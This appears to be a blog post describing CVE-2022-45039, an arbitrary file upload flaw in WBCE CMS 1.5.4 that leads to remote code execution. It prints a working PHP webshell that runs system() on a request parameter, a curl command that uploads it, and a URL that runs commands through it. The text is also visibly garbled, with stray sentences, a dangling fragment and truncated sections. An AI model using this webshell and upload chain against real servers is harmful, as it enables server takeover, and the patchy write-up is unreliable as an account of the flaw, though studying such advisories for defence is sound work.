CVE-2022-45039 - How Attackers Exploited WBCE CMS v1.5.4 For Arbitrary File Upload and Remote Code Execution

WBCE CMS is an open-source content management system written in PHP, designed for simplicity and flexibility. But with flexibility sometimes comes risk. In this post, we're diving deep into a critical vulnerability—CVE-2022-45039—that was found in WBCE CMS version 1.5.4, allowing attackers to upload arbitrary files, including malicious PHP scripts, and potentially take control of the server.

Let’s break everything down in simple terms: how the bug works, what can be done with it, the actual code that exploits it, and how to secure your application.

What is CVE-2022-45039?

CVE-2022-45039 is an arbitrary file upload vulnerability found in the *Server Settings* module of WBCE CMS version 1.5.4. Because file upload handling is not secure, attackers can sneak in a crafted PHP file disguised as something else, and then execute it on the server.

The impact? Remote Code Execution (RCE). With this, hackers can upload a PHP webshell and gain full control over the server.

How the Vulnerability Works

1. Poor File Validation: When uploading files through the Server Settings module, WBCE CMS v1.5.4 doesn’t strictly check the file type or extension.
2. Missing Server-side Checks: The backend does not enforce proper restrictions, allowing files like .php to slip through.
3. Direct File Access: Uploaded files are saved in a public directory, enabling direct access via a web browser.

They craft a malicious PHP file and upload it.

4. When the attacker visits the uploaded file in their browser, the malicious PHP code gets executed by the server.

Proof-of-Concept Exploit Code

Here's a simple exploit workflow using curl. Let’s say the vulnerable script is at http://target.com/admin/server_settings.php.

1. Prepare a Malicious PHP File

<?php
// simple PHP webshell
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

*Save it as shell.php.*

2. Upload the File

curl -k -X POST -F "uploaded_file=@shell.php" http://target.com/admin/server_settings.php

Visit

http://target.com/uploads/shell.php?cmd=whoami

Insecure web root storage: Uploaded files were stored in a web-accessible directory.

- No authentication or authorization checks on upload: Even admins shouldn't be able to upload PHP files.

Mitigation & Remediation

1. Update immediately: Always run the latest WBCE CMS version.

References

- Official WBCE CMS repo
- WBCE CMS Security Advisories
- NVD Entry for CVE-2022-45039
- WBCE CMS Download

Conclusion

CVE-2022-45039 is a classic example of why web app developers should *never* trust file uploads. If you’re running WBCE CMS v1.5.4, you’re at risk for remote code execution. Patch now, review file upload handlers, and restrict upload directories.

From hobby sites to critical business platforms, keeping your CMS secure should always be a top priority.

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 11/28/2022 21:07:00 UTC